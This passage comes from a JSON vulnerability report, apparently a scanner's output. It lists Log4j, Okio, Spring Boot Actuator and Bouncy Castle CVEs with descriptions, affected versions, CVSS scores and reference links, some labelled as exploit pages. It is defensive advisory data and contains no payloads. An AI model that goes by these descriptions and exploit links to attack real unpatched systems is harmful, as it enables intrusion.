Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.2"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.2"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity 
Exploit","url":"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Dec/2"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Mar/23"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/3"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/13/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/13/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"summary":"Siemens Advisory ssa-397453","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-661247","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"summary":"Siemens Advisory 
ssa-714170","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"summary":"GitHub Advisory GHSA-7rjr-3q55-vv33","url":"https://github.com/advisories/GHSA-7rjr-3q55-vv33"},{"summary":"Apache Advisory LOG4J2-3198","url":"https://issues.apache.org/jira/browse/LOG4J2-3198"},{"summary":"Apache Advisory LOG4J2-3201","url":"https://issues.apache.org/jira/browse/LOG4J2-3201"},{"summary":"Apache Advisory LOG4J2-3214","url":"https://issues.apache.org/jira/browse/LOG4J2-3214"},{"summary":"Apache Advisory LOG4J2-3221","url":"https://issues.apache.org/jira/browse/LOG4J2-3221"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"},{"summary":"Apache Advisory changes-report","url":"https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0"},{"summary":"Apache Advisory lookups","url":"https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup"},{"summary":"Apache Advisory migration","url":"https://logging.apache.org/log4j/2.x/manual/migration.html"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Microsoft Advisory 
microsofts-response-to-cve-2021-44228-apache-log4j2","url":"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"NetApp Advisory ntap-20211210-0007","url":"https://security.netapp.com/advisory/ntap-20211210-0007"},{"summary":"Apple Advisory HT213189","url":"https://support.apple.com/kb/HT213189"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Twitter Advisory 1469345530182455296","url":"https://twitter.com/kurtseifried/status/1469345530182455296"},{"summary":"Bentley Advisory be-2022-0001","url":"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"},{"summary":"Debian Advisory dsa-5020","url":"https://www.debian.org/security/2021/dsa-5020"},{"summary":"Intel Advisory intel-sa-00646","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Nu11secur1ty Exploit","url":"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"},{"summary":"Oracle Advisory alert-cve-2021-44228","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":10.0,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":10.0,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":10.0,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.2"]}],"title":"CVE-2021-44228/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-45105"]}],"cve":"CVE-2021-45105","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-12-18T18:00:07","ids":[{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-45105"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5024"},{"system_name":"NetApp Advisory","text":"ntap-20211218-0001"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-501673"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Recursion","title":"Additional CWE: 
674"},{"category":"description","details":"Vulnerability Description","text":"Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion"},{"category":"details","details":"Vulnerability Details","text":"# Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3. # Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.3"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/19/1"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-501673","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Apache Advisory 
security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45105"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45105"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"NetApp Advisory ntap-20211218-0001","url":"https://security.netapp.com/advisory/ntap-20211218-0001"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Debian Advisory dsa-5024","url":"https://www.debian.org/security/2021/dsa-5024"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Zero Day Initiative 
Exploit","url":"https://www.zerodayinitiative.com/advisories/ZDI-21-1541"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.6,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":8.6,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":8.6,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"]}],"title":"CVE-2021-45105/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9488"]}],"cve":"CVE-2020-9488","cwe":{"id":"295","name":"Improper Certificate Validation"},"discovery_date":"2020-06-05T14:15:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-9488"},{"system_name":"Apache Advisory","text":"LOG4J2-2819"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-5020"},{"system_name":"NetApp Advisory","text":"ntap-20200504-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper validation of certificate with host mismatch in Apache Log4j SMTP appender"},{"category":"details","details":"Vulnerability Details","text":"# Improper validation of 
certificate with host mismatch in Apache Log4j SMTP appender Improper validation of certificate with host mismatch in Apache Log4j SMTP appender prior to version 2.13.2. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.3"]},"references":[{"summary":"Apache Advisory LOG4J2-2819","url":"https://issues.apache.org/jira/browse/LOG4J2-2819"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0a2699f724156a558afd1abb6c044fb9132caa66dce861b82699722a@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0df3d7a5acb98c57e64ab9266aa21eeee1d9b399addb96f9cf1cbe05@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1fc73f0e16ec2fa249d3ad39a5194afb9cc5afb4c023dc0bab5a5881@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r22a56beb76dd8cf18e24fda9072f1e05990f49d6439662d3782a392f@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2f209d271349bafd91537a558a279c08ebcff8fa3e547357d58833e6@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r33864a0fc171c1c4bf680645ebb6d4f8057899ab294a43e1e4fe9d04@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r393943de452406f0f6f4b3def9f8d3c071f96323c1f6ed1a098f7fe4@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r3d1d00441c55144a4013adda74b051ae7864128ebcfb6ee9721a2eb3@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4285398e5585a0456d3d9db021a4fce6e6fcf3ec027dfa13a450ec98@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r45916179811a32cbaa500f972de9098e6ee80ee81c7f134fce83e03a@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r48bcd06049c1779ef709564544c3d8a32ae6ee5c3b7281a606ac4463@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r48efc7cb5aeb4e1f67aaa06fb4b5479a5635d12f07d0b93fc2d08809@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4d5dc9f3520071338d9ebc26f9f158a43ae28a91923d176b550a807b@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4db540cafc5d7232c62e076051ef661d37d345015b2e59b3f81a932f@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4ed1f49616a8603832d378cb9d13e7a8b9b27972bb46d946ccd8491f@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5a68258e5ab12532dc179edae3d6e87037fa3b50ab9d63a90c432507@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r65578f3761a89bc164e8964acd5d913b9f8fd997967b195a89a97ca3@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7641ee788e1eb1be4bb206a7d15f8a64ec6ef23e5ec6132d5a567695@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache 
Mailing List","url":"https://lists.apache.org/thread.html/r7e739f2961753af95e2a3a637828fb88bfca68e5d6b0221d483a9ee5@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8c001b9a95c0bbec06f4457721edd94935a55932e64b82cc5582b846@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9776e71e3c67c5d13a91c1eba0dc025b48b802eb7561cc6956d6961c@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9a79175c393d14d760a0ae3731b4a873230a16ef321aa9ca48a810cd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra051e07a0eea4943fa104247e69596f094951f51512d42c924e86c75@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra632b329b2ae2324fabbad5da204c4ec2e171ff60348ec4ba698fd40@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc45eb0f53fd6242af3e666c2189464f848a851d408289840cecc6e3@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc6b81c013618d1de1b5d6b8c1088aaf87b4bacc10c2371f15a566701@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd55f65c6822ff235eda435d31488cfbb9aa7055cdf47481ebee777cc@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd8e87c4d69df335d0ba7d815b63be8bd8a6352f429765c52eb07ddac@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re024d86dffa72ad800f2848d0c77ed93f0b78ee808350b477a6ed987@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rec34b1cccf907898e7cb36051ffac3ccf1ea89d0b261a2a3b3fb267f@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1c2a81a08034c688b8f15cf58a4cfab322d00002ca46d20133bee20@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9488"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9488"},{"summary":"NetApp Advisory ntap-20200504-0003","url":"https://security.netapp.com/advisory/ntap-20200504-0003"},{"summary":"Debian Advisory dsa-5020","url":"https://www.debian.org/security/2021/dsa-5020"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":3.7,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.7,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":3.7,"temporalSeverity":"LOW","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"]}],"title":"CVE-2020-9488/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-3635"]}],"cve":"CVE-2023-3635","cwe":{"id":"195","name":"Signed to Unsigned Conversion Error"},"discovery_date":"2023-07-12T21:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2023-3635"},{"system_name":"JFrog Advisory","text":"okio-gzip-source-unhandled-exception-dos-xray-523195"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Conversion between Numeric Types","title":"Additional CWE: 681"},{"category":"description","details":"Vulnerability Description","text":"Okio Signed to Unsigned 
Conversion Error vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Okio Signed to Unsigned Conversion Error vulnerability GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class."}],"product_status":{"known_affected":["com.squareup.okio/okio@vers:maven/>=0.5.0|<=1.17.5"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3635"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3635"},{"summary":"JFrog Advisory okio-gzip-source-unhandled-exception-dos-xray-523195","url":"https://research.jfrog.com/vulnerabilities/okio-gzip-source-unhandled-exception-dos-xray-523195"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.squareup.okio/okio@vers:maven/>=0.5.0|<=1.17.5"]}],"title":"CVE-2023-3635/pkg:maven/com.squareup.okio/okio@1.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-34055"]}],"cve":"CVE-2023-34055","discovery_date":"2023-11-28T09:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2023-34055"},{"system_name":"Snyk 
Advisory","text":"SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862"},{"system_name":"NetApp Advisory","text":"ntap-20231221-0010"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Boot Actuator denial of service vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Spring Boot Actuator denial of service vulnerability In Spring Boot versions 2.7.0 - 2.7.17, 3.0.0-3.0.12 and 3.1.0-3.1.5, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC or Spring WebFlux * `org.springframework.boot:spring-boot-actuator` is on the classpath"}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-actuator@vers:maven/>=1.0.0.RELEASE|<=2.7.9"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34055"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34055"},{"summary":"NetApp Advisory ntap-20231221-0010","url":"https://security.netapp.com/advisory/ntap-20231221-0010"},{"summary":"Snyk Advisory SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862","url":"https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862"},{"summary":"Cve 
2023","url":"https://spring.io/security/cve-2023-34055"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["org.springframework.boot/spring-boot-actuator@vers:maven/>=1.0.0.RELEASE|<=2.7.9"]}],"title":"CVE-2023-34055/pkg:maven/org.springframework.boot/spring-boot-actuator@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-15522"]}],"cve":"CVE-2020-15522","cwe":{"id":"203","name":"Observable Discrepancy"},"discovery_date":"2021-08-13T15:22:31","ids":[{"system_name":"CVE Record","text":"CVE-2020-15522"},{"system_name":"NetApp Advisory","text":"ntap-20210622-0007"}],"notes":[{"audience":"developers","category":"other","text":"Concurrent Execution using Shared Resource with Improper Synchronization","title":"Additional CWE: 362"},{"category":"description","details":"Vulnerability Description","text":"Timing based private key exposure in Bouncy Castle"},{"category":"details","details":"Vulnerability Details","text":"# Timing based private key exposure in Bouncy Castle Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.2.1, BC before 1.66, BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when 